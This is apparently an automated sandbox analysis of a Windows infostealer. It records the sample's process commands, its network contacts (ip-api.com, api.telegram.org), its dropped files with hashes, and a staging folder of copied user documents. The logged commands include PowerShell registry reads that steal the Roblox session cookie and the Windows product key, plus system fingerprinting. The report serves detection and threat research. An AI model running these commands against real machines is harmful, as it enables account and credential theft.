tree /A /F

C:\Windows\System32\Wbem\WMIC.exe

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\n4jwrekj\n4jwrekj.cmdline"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8211.tmp" "c:\Users\Admin\AppData\Local\Temp\n4jwrekj\CSC46F09258AF984D52A38A9DE811F0B549.TMP"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "getmac"

C:\Windows\system32\getmac.exe

getmac

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic os get Caption"

C:\Windows\System32\Wbem\WMIC.exe

wmic os get Caption

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | gstatic.com | udp
GB | 216.58.201.99:443 | gstatic.com | tcp
US | 8.8.8.8:53 | 99.201.58.216.in-addr.arpa | udp
US | 208.95.112.1:80 | ip-api.com | tcp
NL | 149.154.167.220:443 | api.telegram.org | tcp

Files

C:\Users\Admin\AppData\Local\Temp\_MEI43122\python312.dll

MD5 3c388ce47c0d9117d2a50b3fa5ac981d
SHA1 038484ff7460d03d1d36c23f0de4874cbaea2c48
SHA256 c98ba3354a7d1f69bdca42560feec933ccba93afcc707391049a065e1079cddb
SHA512 e529c5c1c028be01e44a156cd0e7cad0a24b5f91e5d34697fafc395b63e37780dc0fac8f4c5d075ad8fe4bd15d62a250b818ff3d4ead1e281530a4c7e3ce6d35

C:\Users\Admin\AppData\Local\Temp\_MEI43122\VCRUNTIME140.dll

MD5 be8dbe2dc77ebe7f88f910c61aec691a
SHA1 a19f08bb2b1c1de5bb61daf9f2304531321e0e40
SHA256 4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83
SHA512 0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

C:\Users\Admin\AppData\Local\Temp\_MEI43122\base_library.zip

MD5 8dad91add129dca41dd17a332a64d593
SHA1 70a4ec5a17ed63caf2407bd76dc116aca7765c0d
SHA256 8de4f013bfecb9431aabaa97bb084fb7de127b365b9478d6f7610959bf0d2783
SHA512 2163414bc01fc30d47d1de763a8332afe96ea7b296665b1a0840d5197b7e56f4963938e69de35cd2bf89158e5e2240a1650d00d86634ac2a5e2ad825455a2d50

C:\Users\Admin\AppData\Local\Temp\_MEI43122\_ctypes.pyd

MD5 bbd5533fc875a4a075097a7c6aba865e
SHA1 ab91e62c6d02d211a1c0683cb6c5b0bdd17cbf00
SHA256 be9828a877e412b48d75addc4553d2d2a60ae762a3551f9731b50cae7d65b570
SHA512 23ef351941f459dee7ed2cebbae21969e97b61c0d877cfe15e401c36369d2a2491ca886be789b1a0c5066d6a8835fd06db28b5b28fb6e9df84c2d0b0d8e9850e

C:\Users\Admin\AppData\Local\Temp\_MEI43122\libffi-8.dll

MD5 0f8e4992ca92baaf54cc0b43aaccce21
SHA1 c7300975df267b1d6adcbac0ac93fd7b1ab49bd2
SHA256 eff52743773eb550fcc6ce3efc37c85724502233b6b002a35496d828bd7b280a
SHA512 6e1b223462dc124279bfca74fd2c66fe18b368ffbca540c84e82e0f5bcbea0e10cc243975574fa95ace437b9d8b03a446ed5ee0c9b1b094147cefaf704dfe978

C:\Users\Admin\AppData\Local\Temp\_MEI43122\_bz2.pyd

MD5 223fd6748cae86e8c2d5618085c768ac
SHA1 dcb589f2265728fe97156814cbe6ff3303cd05d3
SHA256 f81dc49eac5ecc528e628175add2ff6bda695a93ea76671d7187155aa6326abb
SHA512 9c22c178417b82e68f71e5b7fe7c0c0a77184ee12bd0dc049373eace7fa66c89458164d124a9167ae760ff9d384b78ca91001e5c151a51ad80c824066b8ecce6

C:\Users\Admin\AppData\Local\Temp\_MEI43122\_sqlite3.pyd

MD5 29464d52ba96bb11dbdccbb7d1e067b4
SHA1 d6a288e68f54fb3f3b38769f271bf885fd30cbf6
SHA256 3e96cd9e8abbea5c6b11ee91301d147f3e416ac6c22eb53123eaeae51592d2fe
SHA512 3191980cdf4ab34e0d53ba18e609804c312348da5b79b7242366b9e3be7299564bc1ec08f549598041d434c9c5d27684349eff0eaa45f8fa66a02dd02f97862b

C:\Users\Admin\AppData\Local\Temp\_MEI43122\sqlite3.dll

MD5 612fc8a817c5faa9cb5e89b0d4096216
SHA1 c8189cbb846f9a77f1ae67f3bd6b71b6363b9562
SHA256 7da1c4604fc97ba033830a2703d92bb6d10a9bba201ec64d13d5ccbfecd57d49
SHA512 8a4a751af7611651d8d48a894c0d67eb67d5c22557ba4ddd298909dd4fb05f5d010fe785019af06e6ca2e406753342c54668e9c4e976baf758ee952834f8a237

C:\Users\Admin\AppData\Local\Temp\_MEI43122\_lzma.pyd

MD5 05e8b2c429aff98b3ae6adc842fb56a3
SHA1 834ddbced68db4fe17c283ab63b2faa2e4163824
SHA256 a6e2a5bb7a33ad9054f178786a031a46ea560faeef1fb96259331500aae9154c
SHA512 badeb99795b89bc7c1f0c36becc7a0b2ce99ecfd6f6bb493bda24b8e57e6712e23f4c509c96a28bc05200910beddc9f1536416bbc922331cae698e813cbb50b3

C:\Users\Admin\AppData\Local\Temp\_MEI43122\_ssl.pyd

MD5 5b9b3f978d07e5a9d701f832463fc29d
SHA1 0fcd7342772ad0797c9cb891bf17e6a10c2b155b
SHA256 d568b3c99bf0fc35a1f3c5f66b4a9d3b67e23a1d3cf0a4d30499d924d805f5aa
SHA512 e4db56c8e0e9ba0db7004463bf30364a4e4ab0b545fb09f40d2dba67b79b6b1c1db07df1f017501e074abd454d1e37a4167f29e7bbb0d4f8958fa0a2e9f4e405

C:\Users\Admin\AppData\Local\Temp\_MEI43122\_socket.pyd

MD5 dc06f8d5508be059eae9e29d5ba7e9ec
SHA1 d666c88979075d3b0c6fd3be7c595e83e0cb4e82
SHA256 7daff6aa3851a913ed97995702a5dfb8a27cb7cf00fb496597be777228d7564a
SHA512 57eb36bc1e9be20c85c34b0a535b2349cb13405d60e752016e23603c4648939f1150e4dbebc01ec7b43eb1a6947c182ccb8a806e7e72167ad2e9d98d1fd94ab3

C:\Users\Admin\AppData\Local\Temp\_MEI43122\_queue.pyd

MD5 6e0cb85dc94e351474d7625f63e49b22
SHA1 66737402f76862eb2278e822b94e0d12dcb063c5
SHA256 3f57f29abd86d4dc8f4ca6c3f190ebb57d429143d98f0636ff5117e08ed81f9b
SHA512 1984b2fc7f9bbdf5ba66716fc60dcfd237f38e2680f2fc61f141ff7e865c0dbdd7cdc47b3bc490b426c6cfe9f3f9e340963abf428ea79eb794b0be7d13001f6a

C:\Users\Admin\AppData\Local\Temp\_MEI43122\_hashlib.pyd

MD5 eedb6d834d96a3dffffb1f65b5f7e5be
SHA1 ed6735cfdd0d1ec21c7568a9923eb377e54b308d
SHA256 79c4cde23397b9a35b54a3c2298b3c7a844454f4387cb0693f15e4facd227dd2
SHA512 527bd7bb2f4031416762595f4ce24cbc6254a50eaf2cc160b930950c4f2b3f5e245a486972148c535f8cd80c78ec6fa8c9a062085d60db8f23d4b21e8ae4c0ad

C:\Users\Admin\AppData\Local\Temp\_MEI43122\_decimal.pyd

MD5 3055edf761508190b576e9bf904003aa
SHA1 f0dc8d882b5cd7955cc6dfc8f9834f70a83c7890
SHA256 e4104e47399d3f635a14d649f61250e9fd37f7e65c81ffe11f099923f8532577
SHA512 87538fe20bd2c1150a8fefd0478ffd32e2a9c59d22290464bf5dfb917f6ac7ec874f8b1c70d643a4dc3dd32cbe17e7ea40c0be3ea9dd07039d94ab316f752248

C:\Users\Admin\AppData\Local\Temp\_MEI43122\unicodedata.pyd

MD5 16be9a6f941f1a2cb6b5fca766309b2c
SHA1 17b23ae0e6a11d5b8159c748073e36a936f3316a
SHA256 10ffd5207eeff5a836b330b237d766365d746c30e01abf0fd01f78548d1f1b04
SHA512 64b7ecc58ae7cf128f03a0d5d5428aaa0d4ad4ae7e7d19be0ea819bbbf99503836bfe4946df8ee3ab8a92331fdd002ab9a9de5146af3e86fef789ce46810796b

C:\Users\Admin\AppData\Local\Temp\_MEI43122\select.pyd

MD5 92b440ca45447ec33e884752e4c65b07
SHA1 5477e21bb511cc33c988140521a4f8c11a427bcc
SHA256 680df34fb908c49410ac5f68a8c05d92858acd111e62d1194d15bdce520bd6c3
SHA512 40e60e1d1445592c5e8eb352a4052db28b1739a29e16b884b0ba15917b058e66196988214ce473ba158704837b101a13195d5e48cb1dc2f07262dfecfe8d8191

C:\Users\Admin\AppData\Local\Temp\_MEI43122\libssl-3.dll

MD5 19a2aba25456181d5fb572d88ac0e73e
SHA1 656ca8cdfc9c3a6379536e2027e93408851483db
SHA256 2e9fbcd8f7fdc13a5179533239811456554f2b3aa2fb10e1b17be0df81c79006
SHA512 df17dc8a882363a6c5a1b78ba3cf448437d1118ccc4a6275cc7681551b13c1a4e0f94e30ffb94c3530b688b62bff1c03e57c2c185a7df2bf3e5737a06e114337

C:\Users\Admin\AppData\Local\Temp\_MEI43122\libcrypto-3.dll

MD5 e547cf6d296a88f5b1c352c116df7c0c
SHA1 cafa14e0367f7c13ad140fd556f10f320a039783
SHA256 05fe080eab7fc535c51e10c1bd76a2f3e6217f9c91a25034774588881c3f99de
SHA512 9f42edf04c7af350a00fa4fdf92b8e2e6f47ab9d2d41491985b20cd0adde4f694253399f6a88f4bdd765c4f49792f25fb01e84ec03fd5d0be8bb61773d77d74d

memory/3168-53-0x00007FFCB7CC3000-0x00007FFCB7CC5000-memory.dmp

memory/3168-54-0x000001F27A550000-0x000001F27A572000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qdafxj0r.neo.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3168-63-0x00007FFCB7CC0000-0x00007FFCB8782000-memory.dmp

memory/3168-64-0x00007FFCB7CC0000-0x00007FFCB8782000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 627073ee3ca9676911bee35548eff2b8
SHA1 4c4b68c65e2cab9864b51167d710aa29ebdcff2e
SHA256 85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c
SHA512 3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 408641808e457ab6e23d62e59b767753
SHA1 4205cfa0dfdfee6be08e8c0041d951dcec1d3946
SHA256 3921178878eb416764a6993c4ed81a1f371040dda95c295af535563f168b4258
SHA512 e7f3ffc96c7caad3d73c5cec1e60dc6c7d5ed2ced7d265fbd3a402b6f76fed310a087d2d5f0929ab90413615dad1d54fce52875750057cffe36ff010fc6323fb

memory/3168-178-0x00007FFCB7CC0000-0x00007FFCB8782000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 50a8221b93fbd2628ac460dd408a9fc1
SHA1 7e99fe16a9b14079b6f0316c37cc473e1f83a7e6
SHA256 46e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e
SHA512 27dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0

\??\c:\Users\Admin\AppData\Local\Temp\n4jwrekj\n4jwrekj.cmdline

MD5 496d3de9ec6951172801af485c7321ba
SHA1 bd257599e00cb5a7a55077386eb2bb7a5fbca983
SHA256 7cb8a55e22f140318ff4c6bb271f3521ec7e2f4d5af9c9ba47e4ad0c5b1fd367
SHA512 e3198cfef2a54081732b0af0b8cee2ff1f74c335951428d92f87cddc527c6dd94a7bc5504700f10181b684081d8f91cc7181e1de4a8f2e92269dcbdf73e56dec

\??\c:\Users\Admin\AppData\Local\Temp\n4jwrekj\n4jwrekj.0.cs

MD5 c76055a0388b713a1eabe16130684dc3
SHA1 ee11e84cf41d8a43340f7102e17660072906c402
SHA256 8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7
SHA512 22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

\??\c:\Users\Admin\AppData\Local\Temp\n4jwrekj\CSC46F09258AF984D52A38A9DE811F0B549.TMP

MD5 8e960a2626bd95753fe0e6575f2be01d
SHA1 18327e3767dc4bea16aa467ceab590f465ee98ca
SHA256 66468d11f78e22ce2cb3b73272bbce1ba47327cb96165285fa31fac9eb423f59
SHA512 bb12e7f7959c9d077ea2b9b74d3482aaa7b085a6ea411b7b82c6dc8b5cf6ab2350db1eec6df81f60f7d6691bb239b6fc44cb228ecbfa0786696acc90470175ce

C:\Users\Admin\AppData\Local\Temp\RES8211.tmp

MD5 f11a8c23884e9bbe40b6d92f65edf856
SHA1 0771df87a46541db5552e908c560d10375acda53
SHA256 1e66780326d9635b4baff5bc2b0d33ff93c72419a5c723142e6b4d9ec4ed4def
SHA512 cb6016d9fb7a1cc46f2aa15de42066280f47fa12cb0cad4f161aa958708889c9f9df58af25ec37bf2e58bb5ead771a76a098b0e701f5fd7e4a37a5af5762b123

C:\Users\Admin\AppData\Local\Temp\n4jwrekj\n4jwrekj.dll

MD5 b68901b5eb818b79cc10d8f12da57299
SHA1 344fbe710bb94e1fff3cf74c87b21248aa7fe063
SHA256 fa6da47218221210a5a7854d6641db54e920b0bfc78329809f4e700a5ee8650c
SHA512 9c88a7d42929d797716e981d414ee91f371a162e10792c17d819c42bb8dcd8681b430f432c560ccfbc919cc2cfc48c938742b3e166e754d7de24dbf23d70cbda

memory/4580-199-0x00000170A3A20000-0x00000170A3A28000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6f5b98ce0ad06ebb5c2ec11ffec5fbb1
SHA1 82e1ea9056feba9ddcc85791cd3994f8607ada84
SHA256 2cda8a09bad4890dd11d84c6c38c71f07130bfce58ce09f308452e9a650bad93
SHA512 bf0a7c56e2d3edc7169772008576edab790033fdab0678dda8b952c85ceafbdcaf38a208f25b1a2a05c3444de0f98fec923868d4bf1aa4201dda0f6b5b3128e6

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 7332074ae2b01262736b6fbd9e100dac
SHA1 22f992165065107cc9417fa4117240d84414a13c
SHA256 baea84fda6c1f13090b8cbd91c920848946f10ce155ef31a1df4cd453ee7e4aa
SHA512 4ae6f0e012c31ac1fc2ff4a8877ce2b4667c45b6e651de798318a39a2b6fd39a6f72dffa8b0b89b7a045a27d724d195656faa25a9fec79b22f37ddebb5d22da2

C:\Users\Admin\AppData\Local\Temp\Β β€€β€Šβ€†β€Žβ€‰β€Œβ€‰Β β€Ž\Display (1).png

MD5 a5a57e441f1b8c055581f1c210a9adb3
SHA1 2d79f933b86f4f83b4b2d7cedd4c0c9469fd9e14
SHA256 50179c68a4d3b33858f6dedc2fe4816278363a42e4bbe6a4ca46a940ecb20032
SHA512 269c56829975f240f93e69fe5874cc9c102a3f3cd97015208b627bdac1f462063bb8ca874b2dd043ff2b30384d10fd0fd794165687cc0bb98f235fd91456cc85

C:\Users\Admin\AppData\Local\Temp\Β β€€β€Šβ€†β€Žβ€‰β€Œβ€‰Β β€Ž\Common Files\Desktop\GroupDeny.docx

MD5 3d314a61604a97ccad6da53da36cc080
SHA1 a5ff105b5af0ce85e65fc3bf172021ebd149a449
SHA256 094075a876899c6ad4cf8306156cdec3cb094a16dbbefcee0e8454c9cd16fe4a
SHA512 86720c55638c10ea5f098ec4559250c36839563e423b6bbadeed645bd175905894a0315449679e457fe9ed75fad4411b5365d73bfb16ed58b22cad18339e6bc6

C:\Users\Admin\AppData\Local\Temp\Β β€€β€Šβ€†β€Žβ€‰β€Œβ€‰Β β€Ž\Common Files\Desktop\SkipBackup.php

MD5 a6d08ff32ea950e1ff0ef5e50d1b3ac3
SHA1 aca35494290faf595964132d035ac9fc61c44ed8
SHA256 38e57803e2536da7774743b26a3494f95aeb31a8eed1c31ad302cdb6fe6f806c
SHA512 19b2ee3fc0f650708d3aed562d710701af53a47e68fa19dd35a35e9916f0c5a406342c2d2ae82e8015f9baf82d45284d251962b11837dc3138ffe921d2ffbebf

C:\Users\Admin\AppData\Local\Temp\Β β€€β€Šβ€†β€Žβ€‰β€Œβ€‰Β β€Ž\Common Files\Desktop\MergeReset.csv

MD5 9266f60565000b2ec0c121588dd1069c
SHA1 657b423ede30e41fd9b7c410e7062a5aa64d2f01
SHA256 e9e7884af572bd1ca0832ae9e45268a3647d2bd842c5d4d104d8a05f65571ed0
SHA512 b1f6a14e4a2a4a3956f0d6961102fdacd5168712b6c4abe549680586f1bfedaa513a4e1452ee76b4f1e5aea19180f36066080324463e1f5867d2d501c681c90e

C:\Users\Admin\AppData\Local\Temp\Β β€€β€Šβ€†β€Žβ€‰β€Œβ€‰Β β€Ž\Common Files\Documents\AssertSelect.xls

MD5 ea646902540ab16fe1d837b58c1def0d
SHA1 97ca9ed0a5736d2aaf6c4ed68fa371d208d49128
SHA256 bd9637cd2d4eb831e3c956ca6d956315d6eae92185aac877d89b98a78b92005f
SHA512 73bb9952d75356f79e55bbfb17bf65edd0c9569fc86e88f867a63cd4a673d3c77d00416279d2aa1063356bee2554d12595e5ca58ed974ed63071b8cfafc26bbd

C:\Users\Admin\AppData\Local\Temp\Β β€€β€Šβ€†β€Žβ€‰β€Œβ€‰Β β€Ž\Common Files\Documents\Are.docx

MD5 a33e5b189842c5867f46566bdbf7a095
SHA1 e1c06359f6a76da90d19e8fd95e79c832edb3196
SHA256 5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454
SHA512 f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

C:\Users\Admin\AppData\Local\Temp\Β β€€β€Šβ€†β€Žβ€‰β€Œβ€‰Β β€Ž\Common Files\Documents\SendLimit.txt

MD5 07452615e511356bf0ef606ae94e3fb1
SHA1 7f965d44095ccc16655b3c0514f01134b26266e4
SHA256 3af004295b818df7a3d22bf4af527a1edff939f29e8e8209dba16ba6093d3412
SHA512 3ce14c82ffdc4e916eaeadd304cd4c53a7cb79919306153b2ef3ca0f4b8682501f1bf96a76c13c866f78ab03cc10c34889ea1f1f934a848020ca8a09fad6aac7

C:\Users\Admin\AppData\Local\Temp\Β β€€β€Šβ€†β€Žβ€‰β€Œβ€‰Β β€Ž\Common Files\Documents\ResetPublish.txt

MD5 02781d2931f2801f101fd10f926cbfdb
SHA1 931bc83b2831242b5138e6b411138d6be33d8a70
SHA256 e5dd4a9c12c82023219f873bb8f9ca84e4fbf0fd00c5b90f452299992592b8b3
SHA512 fba2679d5394c7297fe1b0222518443ca24567d34dcb4ce072b804d29aa73a1818815267b746d9a8326d333aed73ae09f41ad7e337d265aa02cbfbbc2887b249

C:\Users\Admin\AppData\Local\Temp\Β β€€β€Šβ€†β€Žβ€‰β€Œβ€‰Β β€Ž\Common Files\Documents\UnpublishProtect.xls

MD5 464874892482f1100a9496968e860ca4
SHA1 40f278b97d6051a0e9cd7da06b8c4fb8f5c49889
SHA256 40359e42936ff25e853caf067713bb45f22592558462308fb634f7a7170956d1
SHA512 140aaf37fb367b75cf060c527b3a102bd9cd58b72a3be4b44340e23734b003cda09950d82c2b0d7ae7e2ef04432e5d99e48df6392334785abe0dccce9cf72579

C:\Users\Admin\AppData\Local\Temp\Β β€€β€Šβ€†β€Žβ€‰β€Œβ€‰Β β€Ž\Common Files\Documents\These.docx

MD5 87cbab2a743fb7e0625cc332c9aac537
SHA1 50f858caa7f4ac3a93cf141a5d15b4edeb447ee7
SHA256 57e3b0d22fa619da90237d8bcf8f922b142c9f6abf47efc5a1f5b208c4d3f023
SHA512 6b678f0dd0030806effe6825fd52a6a30b951e0c3dcf91dfd7a713d387aa8b39ec24368e9623c463360acba5e929e268f75ce996526c5d4485894b8ac6b2e0fa

C:\Users\Admin\AppData\Local\Temp\Β β€€β€Šβ€†β€Žβ€‰β€Œβ€‰Β β€Ž\Common Files\Documents\Recently.docx

MD5 3b068f508d40eb8258ff0b0592ca1f9c
SHA1 59ac025c3256e9c6c86165082974fe791ff9833a
SHA256 07db44a8d6c3a512b15f1cb7262a2d7e4b63ced2130bc9228515431699191cc7
SHA512 e29624bc8fecb0e2a9d917642375bd97b42502e5f23812195a61a4920cae5b6ed540e74dfcf8432dcceb7de906ad0501cdd68056f9b0ec86a6bb0c1e336bfe32

C:\Users\Admin\AppData\Local\Temp\Β β€€β€Šβ€†β€Žβ€‰β€Œβ€‰Β β€Ž\Common Files\Documents\Opened.docx

MD5 bfbc1a403197ac8cfc95638c2da2cf0e
SHA1 634658f4dd9747e87fa540f5ba47e218acfc8af2
SHA256 272ed278e82c84cf4f80f48ec7989e1fc35f2055d6d05b63c8a31880846597a6
SHA512 b8938526fcbf7152805aec130ca553e3ec949cb825430a5d0a25c90ec5eb0863857010484a4b31fdc4bb65a4c92ad7127c812b93114be4569a677f60debe43b1

C:\Users\Admin\AppData\Local\Temp\Β β€€β€Šβ€†β€Žβ€‰β€Œβ€‰Β β€Ž\Common Files\Documents\InvokeCompare.doc

MD5 18c163a72fa52955922f3962566add2f
SHA1 336be80c4c2e37aaa491b605f788c8c282b51a0d
SHA256 2901d7839cce520b20fd6adcbf11e1e4699c4b7bbb1ba96f2c90b5edc8e24dcc
SHA512 d3fef06e64591379675cf7894dc601115d773f4760246b29b4d141cfd4df61782bff5dccfe7dcec59b4080b7e56e75053e40c42d4005b54633875870df7bcc0e

C:\Users\Admin\AppData\Local\Temp\Β β€€β€Šβ€†β€Žβ€‰β€Œβ€‰Β β€Ž\Common Files\Documents\Files.docx

MD5 4a8fbd593a733fc669169d614021185b
SHA1 166e66575715d4c52bcb471c09bdbc5a9bb2f615
SHA256 714cd32f8edacb3befbfc4b17db5b6eb05c2c8936e3bae14ea25a6050d88ae42
SHA512 6b2ebbbc34cd821fd9b3d7711d9cdadd8736412227e191883e5df19068f8118b7c80248eb61cc0a2f785a4153871a6003d79de934254b2c74c33b284c507a33b

C:\Users\Admin\AppData\Local\Temp\Β β€€β€Šβ€†β€Žβ€‰β€Œβ€‰Β β€Ž\Common Files\Documents\ConvertSearch.pdf

MD5 aa5c41a73274c6248c2dd7de1008c23d
SHA1 93f892786d0c941f563eeb291345aa5bd33c1a60
SHA256 b4922be71162f6a46031502f3ce5e749e8e4344deeaf95bd4d360f3d8300c434
SHA512 b80e35286c8717963231b017f43c304144782ee9d8927179e4bd5c78f7d6807a12e89f1a4f09b54014d8ac0167f7939e548637effab2d42efec24257ec751c54

C:\Users\Admin\AppData\Local\Temp\Β β€€β€Šβ€†β€Žβ€‰β€Œβ€‰Β β€Ž\Common Files\Downloads\BackupRedo.dotm

MD5 8f5192880827b52c7c1256c6a9d2b3fc
SHA1 10795e08711ee6b7ea8f4dd42560e9976441a29b
SHA256 1345c189b83d628a3bfa4cef59125f0fb4b2449b8103a5e525de3802fb4a6585
SHA512 d4a858f909c17706383a0660abf5d8d274e1a6d550f8a64f04fcd959ba57e586286602dce246c4a8a186ea0491aaa407da27d7934582715443804fc31e00e927

C:\Users\Admin\AppData\Local\Temp\Β β€€β€Šβ€†β€Žβ€‰β€Œβ€‰Β β€Ž\Common Files\Downloads\HideEnable.jpg

MD5 9902e3e8822014cd6b432fc8c33ede6d
SHA1 b84b12b49040dcae9b01af46130e42e662373fe8
SHA256 bda70476390b6499e5c07de727fcfe864a1f349df6c75549aa2e9e24fc96cb0b
SHA512 f30d236ad69a9b92641dae890584de958b19b62fc915c9cc6f8af693bde5338b56001c89ceb22ef9bc5f94967fe5f4ba4b6707584076986e40ae629bd04af0a0

C:\Users\Admin\AppData\Local\Temp\Β β€€β€Šβ€†β€Žβ€‰β€Œβ€‰Β β€Ž\Common Files\Downloads\RegisterLock.mp4

MD5 748c20c40aaab0453f6d7884ecc493d0
SHA1 cf80a2ca6d7413c84e8f3d59c9b709bee8294e3f
SHA256 50402df553f262bcde1f61d6ed820616195136b5964ca5151d906dbfd31be94c
SHA512 9776df6747717cdeeb1d8fe4ad3cb52d19d01dd4edc7190a2faf1a0c6ebc225f7a2d6a454fd2711a2bd36831d9975834e7530f5b1877b7462482baffdc6b58c4

C:\Users\Admin\AppData\Local\Temp\Β β€€β€Šβ€†β€Žβ€‰β€Œβ€‰Β β€Ž\Common Files\Downloads\ResolveRestart.jpg

MD5 6d35d94692fd2383ec6d1fde35b180e5
SHA1 9159ec10281a1626e5af5190066de87ecc10a696
SHA256 ead01ee6bc5e0874b4ca83d597071a1fbd6ea94a315a99f69c1075ddcd1d8612
SHA512 3611f85fb99c48480752a8d83cebfe4a151c641b81c972891b1851cec15c66373d7752f2afc28a252ed4b97b3ecb50543556afe87afcc608cf171b62982dfe48

C:\Users\Admin\AppData\Local\Temp\Β β€€β€Šβ€†β€Žβ€‰β€Œβ€‰Β β€Ž\Common Files\Downloads\SubmitJoin.xlsx

MD5 eef09c57a4786c4ed653f20868052051
SHA1 940960de35f756ea7f2a6f7f0b743bbbada9ba97
SHA256 72777d69e2c64e83e4a78a11ab3735b334bdebb49506b62e730f1476c3ff3825
SHA512 e29c0f097a10af69978062f5932ba3f35c84a66c3caf37b5cc84562324182a4bdb40386867b1364b77a1b33eed036902f01c213a86c560b140a49da5ef416478

C:\Users\Admin\AppData\Local\Temp\Β β€€β€Šβ€†β€Žβ€‰β€Œβ€‰Β β€Ž\Common Files\Downloads\UnpublishBackup.jpeg

MD5 8bad27c866bc8d65165d71daedfcce37
SHA1 bafb439c6afcd4a55fb1acb18e15f82e21c9303f
SHA256 32b9207cca149f556b30dc560d07d7bae85c4ecff020682a6f528b183bfcf1c0
